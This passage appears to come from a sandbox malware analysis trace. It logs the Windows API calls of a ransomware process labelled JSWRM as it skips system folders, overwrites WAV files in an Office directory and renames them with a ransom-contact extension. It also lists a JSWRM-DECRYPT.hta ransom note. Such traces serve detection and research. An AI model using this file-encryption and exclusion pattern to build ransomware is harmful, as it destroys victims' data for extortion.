lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\CAN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\can.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.889] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=51452) returned 1 [0130.889] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.889] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc8f0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xc8f0, lpOverlapped=0x0) returned 1 [0130.894] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.894] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc8f0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xc8f0, lpOverlapped=0x0) returned 1 [0130.894] CloseHandle (hObject=0x338) returned 1 [0130.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\CAN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\can.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\CAN.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\can.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.895] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9f18, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="COUPLER.WAV", cAlternateFileName="")) returned 1 [0130.895] lstrcmpiW (lpString1="COUPLER.WAV", lpString2=".") returned 1 [0130.895] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="..") returned 1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="...") returned 1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="windows") returned -1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="recovery") returned -1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="perflogs") returned -1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="documents and settings") returned -1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="system volume information") returned -1 [0130.896] lstrcmpiW (lpString1="COUPLER.WAV", lpString2="msocache") returned -1 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPLER.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPLER.WAV", cchWideChar=11, lpMultiByteStr=0x345e508, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUPLER.WAV", lpUsedDefaultChar=0x0) returned 11 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPLER.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPLER.WAV", cchWideChar=11, lpMultiByteStr=0x345e4d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUPLER.WAV", lpUsedDefaultChar=0x0) returned 11 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\COUPLER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\coupler.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.897] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=40728) returned 1 [0130.897] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.897] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9f10, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x9f10, lpOverlapped=0x0) returned 1 [0130.901] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.901] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9f10, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x9f10, lpOverlapped=0x0) returned 1 [0130.901] CloseHandle (hObject=0x338) returned 1 [0130.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\COUPLER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\coupler.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\COUPLER.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\coupler.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.902] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa412, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="HORN.WAV", cAlternateFileName="")) returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2=".") returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="..") returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="...") returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="windows") returned -1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="recovery") returned -1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="perflogs") returned -1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="documents and settings") returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="system volume information") returned -1 [0130.902] lstrcmpiW (lpString1="HORN.WAV", lpString2="msocache") returned -1 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HORN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HORN.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HORN.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HORN.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HORN.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HORN.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\HORN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\horn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.903] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=42002) returned 1 [0130.903] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.903] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xa410, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xa410, lpOverlapped=0x0) returned 1 [0130.907] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.907] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xa410, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xa410, lpOverlapped=0x0) returned 1 [0130.908] CloseHandle (hObject=0x338) returned 1 [0130.908] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\HORN.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\horn.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\HORN.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\horn.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.909] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44ac72c6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44ac72c6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44ac72c6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.909] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.909] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb14e, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="SHOT.WAV", cAlternateFileName="")) returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2=".") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="..") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="...") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="windows") returned -1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="recovery") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="perflogs") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="documents and settings") returned 1 [0130.909] lstrcmpiW (lpString1="SHOT.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.910] lstrcmpiW (lpString1="SHOT.WAV", lpString2="system volume information") returned -1 [0130.910] lstrcmpiW (lpString1="SHOT.WAV", lpString2="msocache") returned 1 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOT.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOT.WAV", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOT.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOT.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOT.WAV", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOT.WAV", lpUsedDefaultChar=0x0) returned 8 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shot.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.910] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=45390) returned 1 [0130.910] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.911] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb140, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xb140, lpOverlapped=0x0) returned 1 [0130.915] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.915] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb140, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xb140, lpOverlapped=0x0) returned 1 [0130.915] CloseHandle (hObject=0x338) returned 1 [0130.915] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOT.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shot.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOT.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shot.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.917] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf548, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="SHOVEL.WAV", cAlternateFileName="")) returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2=".") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="..") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="...") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="windows") returned -1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="recovery") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="perflogs") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="documents and settings") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="system volume information") returned -1 [0130.917] lstrcmpiW (lpString1="SHOVEL.WAV", lpString2="msocache") returned 1 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOVEL.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOVEL.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOVEL.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOVEL.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHOVEL.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHOVEL.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOVEL.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shovel.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.918] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=62792) returned 1 [0130.918] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.918] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf540, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xf540, lpOverlapped=0x0) returned 1 [0130.923] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.924] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf540, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xf540, lpOverlapped=0x0) returned 1 [0130.924] CloseHandle (hObject=0x338) returned 1 [0130.924] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOVEL.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shovel.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SHOVEL.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\shovel.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.925] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xedd6, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="SPLASH.WAV", cAlternateFileName="")) returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2=".") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="..") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="...") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="windows") returned -1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="recovery") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="perflogs") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="documents and settings") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="system volume information") returned -1 [0130.925] lstrcmpiW (lpString1="SPLASH.WAV", lpString2="msocache") returned 1 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPLASH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPLASH.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 